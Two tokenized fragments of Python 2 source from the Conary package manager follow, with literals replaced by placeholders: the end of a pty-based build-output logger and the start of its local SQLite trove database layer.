join ( reqList ) ) <EOL> def reportExcessSuperclassBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( reqList ) ) <EOL> def synchronize ( self ) : <EOL> timestamp = '<STR_LIT>' % time . time ( ) <EOL> timestampLen = len ( timestamp ) <EOL> self . command ( '<STR_LIT>' % timestamp ) <EOL> self . flush ( ) <EOL> syncFile = file ( self . syncPath ) <EOL> def _fileLongEnough ( ) : <EOL> syncFile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> return syncFile . tell ( ) > timestampLen <EOL> def _waitedTooLong ( i , stage ) : <EOL> if i > <NUM_LIT> : <EOL> syncFile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> length = syncFile . tell ( ) <EOL> raise ConaryError ( <EOL> '<STR_LIT>' % ( <EOL> stage , length ) ) <EOL> i = <NUM_LIT:0> <EOL> while not _fileLongEnough ( ) : <EOL> _waitedTooLong ( i , '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> time . sleep ( <NUM_LIT> ) <EOL> def _seekTimestamp ( ) : <EOL> syncFile . seek ( - ( timestampLen + <NUM_LIT:1> ) , <NUM_LIT:2> ) <EOL> i = <NUM_LIT:0> <EOL> _seekTimestamp ( ) <EOL> while syncFile . read ( timestampLen ) != timestamp : <EOL> _waitedTooLong ( i , '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> time . sleep ( <NUM_LIT> ) <EOL> _seekTimestamp ( ) <EOL> def __del__ ( self ) : <EOL> if self . logging and not self . closed : <EOL> self . close ( ) <EOL> def startLog ( self ) : <EOL> """<STR_LIT>""" <EOL> self . restoreTerminalControl = ( sys . stdin . isatty ( ) and <EOL> os . tcgetpgrp ( <NUM_LIT:0> ) == os . getpid ( ) ) <EOL> masterFd , slaveFd = os . openpty ( ) <EOL> signal . signal ( signal . SIGTTOU , signal . SIG_IGN ) <EOL> pid = os . fork ( ) <EOL> if pid : <EOL> os . close ( masterFd ) <EOL> self . _becomeLogSlave ( slaveFd , pid ) <EOL> return <EOL> try : <EOL> os . close ( slaveFd ) <EOL> for writer in self . writers : <EOL> writer . start ( ) <EOL> logger = _ChildLogger ( masterFd , self . lexer , <EOL> self . restoreTerminalControl , self . 
withStdin ) <EOL> try : <EOL> logger . log ( ) <EOL> finally : <EOL> self . lexer . close ( ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> def _becomeLogSlave ( self , slaveFd , loggerPid ) : <EOL> """<STR_LIT>""" <EOL> self . loggerPid = loggerPid <EOL> if self . withStdin and sys . stdin . isatty ( ) : <EOL> self . oldTermios = termios . tcgetattr ( sys . stdin . fileno ( ) ) <EOL> else : <EOL> self . oldTermios = None <EOL> newTermios = termios . tcgetattr ( slaveFd ) <EOL> newTermios [ <NUM_LIT:6> ] [ termios . VTIME ] = '<STR_LIT:\x00>' <EOL> newTermios [ <NUM_LIT:6> ] [ termios . VMIN ] = '<STR_LIT>' <EOL> termios . tcsetattr ( slaveFd , termios . TCSADRAIN , newTermios ) <EOL> tty . setraw ( slaveFd ) <EOL> self . oldStderr = os . dup ( sys . stderr . fileno ( ) ) <EOL> self . oldStdout = os . dup ( sys . stdout . fileno ( ) ) <EOL> if self . withStdin : <EOL> self . oldStdin = os . dup ( sys . stdin . fileno ( ) ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:0> ) <EOL> else : <EOL> self . oldStdin = sys . stdin . fileno ( ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:1> ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:2> ) <EOL> os . close ( slaveFd ) <EOL> self . logging = True <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . logging : <EOL> return <EOL> self . closed = True <EOL> if self . oldStdin != <NUM_LIT:0> : <EOL> os . dup2 ( self . oldStdin , <NUM_LIT:0> ) <EOL> os . dup2 ( self . oldStdout , <NUM_LIT:1> ) <EOL> os . dup2 ( self . oldStderr , <NUM_LIT:2> ) <EOL> if self . oldTermios is not None : <EOL> termios . tcsetattr ( <NUM_LIT:0> , termios . TCSADRAIN , self . oldTermios ) <EOL> if self . oldStdin != <NUM_LIT:0> : <EOL> os . close ( self . oldStdin ) <EOL> os . close ( self . oldStdout ) <EOL> os . close ( self . oldStderr ) <EOL> try : <EOL> if sys . stdin . isatty ( ) and self . restoreTerminalControl : <EOL> os . tcsetpgrp ( <NUM_LIT:0> , os . getpgrp ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> signals = [ signal . 
SIGTERM , signal . SIGKILL ] <EOL> while signals : <EOL> start = time . time ( ) <EOL> while time . time ( ) - start < <NUM_LIT:10> : <EOL> pid , status = os . waitpid ( self . loggerPid , os . WNOHANG ) <EOL> if pid : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> signum = signals . pop ( <NUM_LIT:0> ) <EOL> os . kill ( self . loggerPid , signum ) <EOL> continue <EOL> break <EOL> else : <EOL> os . waitpid ( self . loggerPid , <NUM_LIT:0> ) <EOL> class _ChildLogger : <EOL> def __init__ ( self , ptyFd , lexer , controlTerminal , withStdin ) : <EOL> self . ptyFd = ptyFd <EOL> self . lexer = lexer <EOL> self . shouldControlTerminal = controlTerminal <EOL> self . withStdin = withStdin <EOL> def _controlTerminal ( self ) : <EOL> try : <EOL> if sys . stdin . isatty ( ) : <EOL> os . tcsetpgrp ( <NUM_LIT:0> , os . getpgrp ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> def _resizeTerminal ( self ) : <EOL> """<STR_LIT>""" <EOL> s = struct . pack ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> result = fcntl . ioctl ( sys . stdin . fileno ( ) , termios . TIOCGWINSZ , s ) <EOL> rows , cols = struct . unpack ( '<STR_LIT>' , result ) [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> s = struct . pack ( '<STR_LIT>' , rows , cols , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> fcntl . ioctl ( self . ptyFd , termios . TIOCSWINSZ , s ) <EOL> def _setTerminalSize ( self , rows , cols ) : <EOL> s = struct . pack ( '<STR_LIT>' , rows , cols , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> fcntl . ioctl ( self . ptyFd , termios . TIOCSWINSZ , s ) <EOL> def log ( self ) : <EOL> if self . shouldControlTerminal : <EOL> self . _controlTerminal ( ) <EOL> self . _setTerminalSize ( <NUM_LIT> , <NUM_LIT> ) <EOL> ptyFd = self . ptyFd <EOL> lexer = self . lexer <EOL> stdin = sys . stdin . fileno ( ) <EOL> unLogged = '<STR_LIT>' <EOL> pollObj = select . poll ( ) <EOL> pollObj . register ( ptyFd , select . POLLIN ) <EOL> if self . withStdin and os . 
isatty ( stdin ) : <EOL> pollObj . register ( stdin , select . POLLIN ) <EOL> sigwinch = [ ] <EOL> def sigwinch_handler ( s , f ) : <EOL> sigwinch . append ( True ) <EOL> while True : <EOL> try : <EOL> read = [ x [ <NUM_LIT:0> ] for x in pollObj . poll ( ) ] <EOL> except select . error , msg : <EOL> if msg . args [ <NUM_LIT:0> ] != <NUM_LIT:4> : <EOL> raise <EOL> read = [ ] <EOL> if ptyFd in read : <EOL> try : <EOL> output = os . read ( ptyFd , BUFFER ) <EOL> except OSError , msg : <EOL> if msg . errno == errno . EIO : <EOL> break <EOL> elif msg . errno != errno . EINTR : <EOL> raise <EOL> else : <EOL> lexer . write ( output ) <EOL> if stdin in read : <EOL> try : <EOL> input = os . read ( stdin , BUFFER ) <EOL> except OSError , msg : <EOL> if msg . errno == errno . EIO : <EOL> break <EOL> elif msg . errno != errno . EINTR : <EOL> raise <EOL> else : <EOL> os . write ( ptyFd , input ) <EOL> if sigwinch : <EOL> sigwinch = [ ] </s>
<s> import itertools <EOL> import time <EOL> from conary import dbstore <EOL> from conary import deps , errors , files , streams , trove , versions <EOL> from conary . dbstore import idtable , sqlerrors <EOL> from conary . local import deptable , troveinfo , versiontable , schema <EOL> from conary . lib import api <EOL> from conary . trovetup import TroveTuple <EOL> OldDatabaseSchema = schema . OldDatabaseSchema <EOL> class Tags ( idtable . CachedIdTable ) : <EOL> def __init__ ( self , db ) : <EOL> idtable . CachedIdTable . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class VersionCache ( dict ) : <EOL> def get ( self , vs , ts ) : <EOL> key = vs , ts <EOL> if self . has_key ( key ) : <EOL> return self [ key ] <EOL> ts = [ float ( x ) for x in ts . split ( "<STR_LIT::>" ) ] <EOL> v = versions . VersionFromString ( vs , timeStamps = ts ) <EOL> self [ key ] = v <EOL> return v <EOL> class FlavorCache ( dict ) : <EOL> def get ( self , frozen ) : <EOL> if self . has_key ( frozen ) : <EOL> return self [ frozen ] <EOL> if frozen is None : <EOL> f = deps . deps . Flavor ( ) <EOL> else : <EOL> f = deps . deps . ThawFlavor ( frozen ) <EOL> self [ frozen ] = f <EOL> return f <EOL> class DBTroveFiles : <EOL> """<STR_LIT>""" <EOL> addItemStmt = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> schema . createDBTroveFiles ( db ) <EOL> self . tags = Tags ( self . db ) <EOL> def __getitem__ ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> for path , stream in cu : <EOL> yield ( path , stream ) <EOL> def getByInstanceId ( self , instanceId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> else : <EOL> cu . 
execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> for path , stream in cu : <EOL> yield ( path , stream ) <EOL> def delInstance ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , instanceId ) <EOL> cu . execute ( "<STR_LIT>" , instanceId ) <EOL> def getFileByFileId ( self , fileId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , fileId ) <EOL> else : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , fileId ) <EOL> try : <EOL> path , stream = cu . next ( ) <EOL> return ( path , stream ) <EOL> except StopIteration : <EOL> raise KeyError , fileId <EOL> def addItem ( self , cu , pathId , versionId , path , fileId , instanceId , <EOL> stream , tags , addItemSql = None ) : <EOL> assert ( len ( pathId ) == <NUM_LIT:16> ) <EOL> if addItemSql is None : <EOL> addItemSql = self . addItemStmt <EOL> cu . execute ( addItemSql , pathId , versionId , path , fileId , instanceId , <EOL> <NUM_LIT:1> , stream ) <EOL> streamId = cu . lastrowid <EOL> for tag in tags : <EOL> cu . execute ( "<STR_LIT>" , <EOL> streamId , self . tags [ tag ] ) <EOL> def iterPath ( self , path ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , path ) <EOL> for instanceId in cu : <EOL> yield instanceId [ <NUM_LIT:0> ] <EOL> def removePath ( self , instanceId , path ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( path , instanceId ) ) <EOL> def _updatePathIdsPresent ( self , instanceId , pathIdList , isPresent ) : <EOL> chunkSize = <NUM_LIT> <EOL> plen = len ( pathIdList ) <EOL> cu = self . db . cursor ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < plen : <EOL> clen = min ( chunkSize , plen - i ) <EOL> bvals = [ isPresent , instanceId ] + pathIdList [ i : i + clen ] <EOL> bparams = '<STR_LIT:U+002C>' . join ( '<STR_LIT:?>' * clen ) <EOL> cu . 
execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % bparams , <EOL> bvals ) <EOL> i += clen <EOL> def removePathIds ( self , instanceId , pathIdList ) : <EOL> self . _updatePathIdsPresent ( instanceId , pathIdList , isPresent = <NUM_LIT:0> ) <EOL> def restorePathIds ( self , instanceId , pathIdList ) : <EOL> self . _updatePathIdsPresent ( instanceId , pathIdList , isPresent = <NUM_LIT:1> ) <EOL> def iterFilesWithTag ( self , tag ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , tag ) <EOL> for path , in cu : <EOL> yield path <EOL> class DBInstanceTable : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> schema . createInstances ( db ) <EOL> def iterNames ( self ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for match in cu : <EOL> yield match [ <NUM_LIT:0> ] <EOL> def hasName ( self , name ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> name ) <EOL> return cu . fetchone ( ) != None <EOL> def iterByName ( self , name ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , name ) <EOL> for match in cu : <EOL> yield match <EOL> def addId ( self , troveName , versionId , flavorId , timeStamps , <EOL> isPresent = True , pinned = False ) : <EOL> assert ( min ( timeStamps ) > <NUM_LIT:0> ) <EOL> if isPresent : <EOL> isPresent = <NUM_LIT:1> <EOL> else : <EOL> isPresent = <NUM_LIT:0> <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( troveName , versionId , flavorId , <EOL> "<STR_LIT::>" . join ( [ "<STR_LIT>" % x for x in timeStamps ] ) , isPresent , <EOL> pinned ) ) <EOL> return cu . lastrowid <EOL> def delId ( self , theId ) : <EOL> assert ( type ( theId ) is int ) <EOL> cu = self . db . cursor ( ) <EOL> cu . 
execute ( "<STR_LIT>" , theId ) <EOL> def getId ( self , theId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> pres = "<STR_LIT>" <EOL> else : <EOL> pres = "<STR_LIT>" <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" % pres , theId ) <EOL> try : <EOL> return cu . next ( ) <EOL> except StopIteration : <EOL> raise KeyError , theId <EOL> def isPresent ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> val = cu . fetchone ( ) <EOL> if not val : <EOL> return <NUM_LIT:0> <EOL> return val [ <NUM_LIT:0> ] <EOL> def idIsPresent ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> val = cu . fetchone ( ) <EOL> if not val : <EOL> return <NUM_LIT:0> <EOL> return val [ <NUM_LIT:0> ] <EOL> def setPresent ( self , theId , val , pinned ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> % theId , val , pinned ) <EOL> def has_key ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> return not ( cu . fetchone ( ) == None ) <EOL> def __getitem__ ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> try : <EOL> return cu . next ( ) [ <NUM_LIT:0> ] <EOL> except StopIteration : <EOL> raise KeyError , item <EOL> def get ( self , item , defValue , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> pres = "<STR_LIT>" <EOL> else : <EOL> pres = "<STR_LIT>" <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % pres , item ) <EOL> item = cu . fetchone ( ) <EOL> if not item : <EOL> return defValue <EOL> return item [ <NUM_LIT:0> ] <EOL> def getVersion ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . 
execute ( """<STR_LIT>""" , instanceId ) <EOL> try : <EOL> ( s , t ) = cu . next ( ) <EOL> ts = [ float ( x ) for x in t . split ( "<STR_LIT::>" ) ] <EOL> v = versions . VersionFromString ( s , timeStamps = ts ) <EOL> return v <EOL> except StopIteration : <EOL> raise KeyError , instanceId <EOL> class Flavors ( idtable . IdTable ) : <EOL> def addId ( self , flavor ) : <EOL> return idtable . IdTable . addId ( self , flavor . freeze ( ) ) <EOL> def __getitem__ ( self , flavor ) : <EOL> if flavor is None : <EOL> raise KeyError , "<STR_LIT>" <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <NUM_LIT:0> <EOL> return idtable . IdTable . __getitem__ ( self , flavor . freeze ( ) ) <EOL> def getId ( self , flavorId ) : <EOL> return deps . deps . ThawFlavor ( idtable . IdTable . getId ( self , flavorId ) ) <EOL> def get ( self , flavor , defValue ) : <EOL> if flavor is None : <EOL> return <NUM_LIT:0> <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <NUM_LIT:0> <EOL> return idtable . IdTable . get ( self , flavor . freeze ( ) , defValue ) <EOL> def __delitem__ ( self , flavor ) : <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <EOL> idtable . IdTable . __delitem__ ( self , flavor . freeze ( ) ) <EOL> def getItemDict ( self , itemSeq ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> % ( self . strName , self . keyName , self . tableName , self . strName , <EOL> "<STR_LIT:U+002C>" . join ( [ "<STR_LIT>" % x . freeze ( ) for x in itemSeq ] ) ) ) <EOL> return dict ( cu ) <EOL> def __init__ ( self , db ) : <EOL> idtable . IdTable . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> cu = db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> if cu . fetchone ( ) == None : <EOL> cu . execute ( "<STR_LIT>" ) <EOL> class DBFlavorMap ( idtable . 
IdMapping ) : <EOL> def __init__ ( self , db ) : <EOL> idtable . IdMapping . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> class Database : <EOL> timeout = <NUM_LIT> <EOL> def __init__ ( self , path , timeout = None ) : <EOL> if timeout is not None : <EOL> self . timeout = timeout <EOL> self . db = None <EOL> try : <EOL> self . db = dbstore . connect ( path , driver = "<STR_LIT>" , <EOL> timeout = self . timeout ) <EOL> self . schemaVersion = self . db . getVersion ( ) . major <EOL> except sqlerrors . DatabaseLocked : <EOL> raise errors . DatabaseLockedError <EOL> self . db . dbh . _BEGIN = "<STR_LIT>" <EOL> try : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> except sqlerrors . ReadOnlyDatabase : <EOL> readOnly = True <EOL> else : <EOL> readOnly = False <EOL> self . db . rollback ( ) <EOL> if readOnly and self . schemaVersion < schema . VERSION : <EOL> raise OldDatabaseSchema ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif self . schemaVersion > schema . VERSION : <EOL> raise schema . NewDatabaseSchema ( ) <EOL> self . db . loadSchema ( ) <EOL> newCursor = self . schemaVersion < schema . VERSION <EOL> schema . checkVersion ( self . db ) <EOL> if newCursor : <EOL> cu = self . db . cursor ( ) <EOL> if self . schemaVersion == <NUM_LIT:0> : <EOL> schema . createSchema ( self . db ) <EOL> schema . setupTempDepTables ( self . db , cu ) <EOL> schema . setupTempTables ( self . db , cu ) <EOL> self . troveFiles = DBTroveFiles ( self . db ) <EOL> self . instances = DBInstanceTable ( self . db ) <EOL> self . versionTable = versiontable . VersionTable ( self . db ) <EOL> self . flavors = Flavors ( self . db ) <EOL> self . flavorMap = DBFlavorMap ( self . db ) <EOL> self . depTables = deptable . DependencyTables ( self . db ) <EOL> self . troveInfoTable = troveinfo . TroveInfoTable ( self . db ) <EOL> self . needsCleanup = False <EOL> self . addVersionCache = { } <EOL> self . 
flavorsNeeded = { } <EOL> def __del__ ( self ) : <EOL> if self . db and not self . db . closed : <EOL> self . db . close ( ) <EOL> del self . db <EOL> def begin ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . db . transaction ( ) <EOL> def rollback ( self ) : <EOL> self . needsCleanup = False <EOL> self . db . rollback ( ) <EOL> def iterAllTroveNames ( self ) : <EOL> return self . instances . iterNames ( ) <EOL> def iterFindByName ( self , name , pristine = False ) : <EOL> instanceIds = [ x [ <NUM_LIT:0> ] for x in self . instances . iterByName ( name ) ] <EOL> return self . _iterTroves ( instanceIds = instanceIds , pristine = pristine ) <EOL> def iterVersionByName ( self , name , withFlavors ) : <EOL> cu = self . db . cursor ( ) <EOL> if withFlavors : <EOL> flavorCol = "<STR_LIT>" <EOL> flavorClause = """<STR_LIT>""" <EOL> else : <EOL> flavorCol = "<STR_LIT>" <EOL> flavorClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" <EOL> % ( flavorCol , flavorClause , name ) ) <EOL> flavors = { } <EOL> for ( match , timeStamps , flavorStr ) in cu : <EOL> ts = [ float ( x ) for x in timeStamps . split ( '<STR_LIT::>' ) ] <EOL> version = versions . VersionFromString ( match , timeStamps = ts ) <EOL> if withFlavors : <EOL> f = flavors . get ( flavorStr , None ) <EOL> if f is None : <EOL> f = deps . deps . ThawFlavor ( flavorStr ) <EOL> flavors [ flavorStr ] = f <EOL> yield ( version , f ) <EOL> else : <EOL> yield ( version ) <EOL> def getAllTroveFlavors ( self , troveDict ) : <EOL> outD = { } <EOL> cu = self . db . cursor ( ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for name , versionList in troveDict . iteritems ( ) : <EOL> d = { } . fromkeys ( versionList ) <EOL> outD [ name ] = d <EOL> for key in d : <EOL> d [ key ] = [ ] <EOL> cu . execute ( """<STR_LIT>""" , name ) <EOL> for ( match , timeStamps , flavor ) in cu : <EOL> version = versionCache . get ( match , timeStamps ) <EOL> if outD [ name ] . 
has_key ( version ) : <EOL> outD [ name ] [ version ] . append ( flavorCache . get ( flavor ) ) <EOL> return outD <EOL> def iterAllTroves ( self , withPins = False ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( troveName , version , timeStamps , flavor , pinned ) in cu : <EOL> version = versionCache . get ( version , timeStamps ) <EOL> flavor = flavorCache . get ( flavor ) <EOL> nvf = TroveTuple ( troveName , version , flavor ) <EOL> if withPins : <EOL> yield nvf , ( pinned != <NUM_LIT:0> ) <EOL> else : <EOL> yield nvf <EOL> def pinTroves ( self , name , version , flavor , pin = True ) : <EOL> if flavor is None or flavor . isEmpty ( ) : <EOL> flavorClause = "<STR_LIT>" <EOL> else : <EOL> flavorClause = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorClause , pin , name , version . asString ( ) ) <EOL> @ api . publicApi <EOL> def trovesArePinned ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> def _iter ( tl ) : <EOL> for name , version , flavor in troveList : <EOL> yield ( name , version . asString ( ) , flavor . freeze ( ) ) <EOL> cu . executemany ( "<STR_LIT>" , _iter ( troveList ) , <EOL> start_transaction = False ) <EOL> count = cu . execute ( '<STR_LIT>' ) . next ( ) [ <NUM_LIT:0> ] <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> results = [ x [ <NUM_LIT:0> ] == <NUM_LIT:1> for x in cu ] <EOL> assert ( len ( results ) == count ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return results <EOL> def hasByName ( self , name ) : <EOL> return self . instances . hasName ( name ) <EOL> def getVersionId ( self , version , cache ) : <EOL> theId = cache . get ( version , None ) <EOL> if theId : <EOL> return theId <EOL> theId = self . versionTable . 
get ( version , None ) <EOL> if theId == None : <EOL> theId = self . versionTable . addId ( version ) <EOL> cache [ version ] = theId <EOL> return theId <EOL> def getInstanceId ( self , troveName , versionId , flavorId , <EOL> timeStamps , isPresent = True ) : <EOL> theId = self . instances . get ( ( troveName , versionId , flavorId ) , <EOL> None ) <EOL> if theId is None : <EOL> theId = self . instances . addId ( troveName , versionId , flavorId , <EOL> timeStamps , isPresent = isPresent ) <EOL> return theId <EOL> def _findTroveInstanceId ( self , cu , name , version , flavor ) : <EOL> if flavor . isEmpty ( ) : <EOL> flavorStr = "<STR_LIT>" <EOL> else : <EOL> flavorStr = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorStr , name , str ( version ) ) <EOL> rows = list ( cu ) <EOL> if not len ( rows ) : <EOL> raise errors . TroveNotFound <EOL> return rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> def addTrove ( self , trove , pin = False , oldTroveSpec = None ) : <EOL> cu = self . db . cursor ( ) <EOL> troveName = trove . getName ( ) <EOL> troveVersion = trove . getVersion ( ) <EOL> troveVersionId = self . getVersionId ( troveVersion , { } ) <EOL> self . addVersionCache [ troveVersion ] = troveVersionId <EOL> if oldTroveSpec is not None : <EOL> oldTroveId = self . _findTroveInstanceId ( cu , * oldTroveSpec ) <EOL> else : <EOL> oldTroveId = None <EOL> troveFlavor = trove . getFlavor ( ) <EOL> if not troveFlavor . isEmpty ( ) : <EOL> self . flavorsNeeded [ troveFlavor ] = True <EOL> for ( name , version , flavor ) in trove . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) : <EOL> if not flavor . isEmpty ( ) : <EOL> self . flavorsNeeded [ flavor ] = True <EOL> if self . flavorsNeeded : <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> for flavor in self . flavorsNeeded . keys ( ) : <EOL> cu . execute ( "<STR_LIT>" , <EOL> None , flavor . freeze ( ) ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . 
execute ( "<STR_LIT>" ) <EOL> self . flavorsNeeded = { } <EOL> flavors = { } <EOL> if not troveFlavor . isEmpty ( ) : <EOL> flavors [ troveFlavor ] = True <EOL> for ( name , version , flavor ) in trove . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) : <EOL> if not flavor . isEmpty ( ) : <EOL> flavors [ flavor ] = True <EOL> flavorMap = self . flavors . getItemDict ( flavors . iterkeys ( ) ) <EOL> del flavors <EOL> if troveFlavor . isEmpty ( ) : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = flavorMap [ troveFlavor . freeze ( ) ] <EOL> troveInstanceId = self . instances . get ( ( troveName , troveVersionId , <EOL> troveFlavorId ) , None , justPresent = False ) <EOL> if troveInstanceId : <EOL> self . instances . setPresent ( troveInstanceId , <NUM_LIT:1> , pinned = pin ) <EOL> else : <EOL> assert ( min ( troveVersion . timeStamps ( ) ) > <NUM_LIT:0> ) <EOL> troveInstanceId = self . instances . addId ( troveName , troveVersionId , <EOL> troveFlavorId , troveVersion . timeStamps ( ) , <EOL> pinned = pin ) <EOL> assert ( cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , troveInstanceId ) . next ( ) [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> def _iter ( trove ) : <EOL> for ( name , version , flavor ) , byDefault , isStrong in trove . iterTroveListInfo ( ) : <EOL> versionId = self . getVersionId ( version , self . addVersionCache ) <EOL> if flavor . isEmpty ( ) : <EOL> flavorId = <NUM_LIT:0> <EOL> else : <EOL> flavorId = flavorMap [ flavor . freeze ( ) ] <EOL> flags = <NUM_LIT:0> <EOL> if not isStrong : <EOL> flags |= schema . TROVE_TROVES_WEAKREF <EOL> if byDefault : <EOL> flags |= schema . TROVE_TROVES_BYDEFAULT ; <EOL> yield ( name , versionId , flavorId , <EOL> "<STR_LIT::>" . join ( [ "<STR_LIT>" % x for x in version . timeStamps ( ) ] ) , <EOL> flags ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( trove ) ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . 
execute ( """<STR_LIT>""" , troveInstanceId , True ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> trove . troveInfo . installTime . set ( time . time ( ) ) <EOL> self . depTables . add ( cu , trove , troveInstanceId ) <EOL> self . troveInfoTable . addInfo ( cu , trove , troveInstanceId ) <EOL> cu . execute ( '''<STR_LIT>''' , trove . getName ( ) ) <EOL> collections = cu . fetchall ( ) <EOL> cu . execute ( "<STR_LIT>" , troveInstanceId ) <EOL> collections += cu . fetchall ( ) <EOL> for x , in collections : <EOL> self . _sanitizeTroveCollection ( cu , x , nameHint = trove . getName ( ) ) <EOL> self . _sanitizeTroveCollection ( cu , troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> stmt = cu . compile ( """<STR_LIT>""" ) <EOL> return ( cu , troveInstanceId , stmt , oldTroveId ) <EOL> def 